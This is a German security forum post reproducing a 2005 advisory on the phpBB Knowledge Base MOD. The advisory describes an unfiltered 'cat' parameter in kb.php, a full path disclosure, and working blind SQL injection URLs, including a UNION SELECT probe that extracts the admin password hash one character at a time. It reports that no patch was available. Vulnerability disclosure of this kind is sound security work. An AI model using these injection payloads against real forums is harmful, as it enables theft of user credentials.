[SePro Advisory #2] phpBB - Knowledge Base MOD - SQL-Injection&Full Path Disclosure

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von z4ratustra, 12. Februar 2006 .

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 12. Februar 2006
    [SePro Advisory #2] phpBB - Knowledge Base MOD SQL-Injection vulnerability and Full Path Disclosure
    =====================================================================================================

    Vendor: phpbb
    URL:http:/www.phpbb.com/
    Risk:High
    Date: 18.04.05



    Credits:
    ================================
    Discovered by [R] and deluxe89



    Discussion:
    ================================
    The phpbb - Knowledge Base MOD has a relatively hard to exploit SQL-Injection vulnerability.
    However, an attacker can exploit this bug and receive informations from the database.



    The Bug:
    ================================
    The script doesn't filter the cat variable.
    If we apply something wrong here:

    /kb.php?mode=cat&cat='

    We will get an error similar to this:

    Could not obtain category data
    DEBUG MODE
    SQL Error : 1064 You have an error in your SQL syntax
    SELECT * FROM phpbb_kb_categories WHERE category_id = \'
    Line : 131
    File : /here/is/the/full/path/functions_kb.php



    /kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WH ERE+1=0
    No match: Categorie doesn't exist.

    /kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users
    Match: DEBUG MODE - SQL-Error

    Therefor the only thing an attacker can find out is whether a row is matched or not.



    Exploit:
    ================================
    The attacker may compare the informations in the database with test values. Example:

    0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+ user_id=2+AND+ascii(substring(user_password,1,1))= 97

    If it returns an SQL-Error, the first character of the hash is an 'a'.
    Exploit available at the websites below.



    Patch:
    ================================
    No patch available by now.



    Greetz to madinfect, reddi, darkkilla, EaTh, Astovidatu and Doc

    http://www.security-project.org
    http://www.batznet.com
     

  2. Anzeige

  3. Videos zum Thema
Die Seite wird geladen...
Similar Threads - SePro Advisory phpBB
  1. Diagnoseprogramm

    ManiacKiller , 17. April 2011 , im Forum: Hardware & Peripherie
    Antworten:
    7
    Aufrufe:
    430
  2. Startup-Diagnoseprogramm

    Lock3 , 26. Oktober 2009 , im Forum: Anwendungssoftware
    Antworten:
    2
    Aufrufe:
    239
  3. Antworten:
    8
    Aufrufe:
    456
  4. Antworten:
    2
    Aufrufe:
    226
  5. Antworten:
    0
    Aufrufe:
    455